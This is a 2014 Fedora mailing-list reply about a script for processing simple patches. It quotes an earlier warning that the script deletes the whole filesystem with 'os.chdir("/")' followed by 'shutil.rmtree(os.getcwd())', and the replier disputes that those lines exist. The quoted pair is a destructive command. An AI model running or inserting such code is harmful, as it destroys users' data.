WARNING: malicious code (was: Re: [Announce] Simple Patch Policy)
Artifex Maximus
artifexor at gmail.com
Mon Jul 7 18:58:38 UTC 2014
On Sun, Jul 6, 2014 at 1:04 PM, Till Maas <opensource at till.name> wrote:
>
> On Fri, Jul 04, 2014 at 04:26:07PM +0200, Sandro Mani wrote:
>
> > * A script automating most of the process of validating and processing the
> > request can be found at
> >
> > https://github.com/manisandro/fedora-process-simple-patch/blob/master/process-simple-patch.py
>
> Do not run this script, because it contains malicious code that
> might remove all files from your system! The code can be found in lines
> 301-302:
>
> | 301 os.chdir("/")
> | 302 shutil.rmtree(os.getcwd())
Found no such lines. rmtree is only in line 361 (shutil.rmtree(tmpdir)).
Bye,
a
More information about the devel
mailing list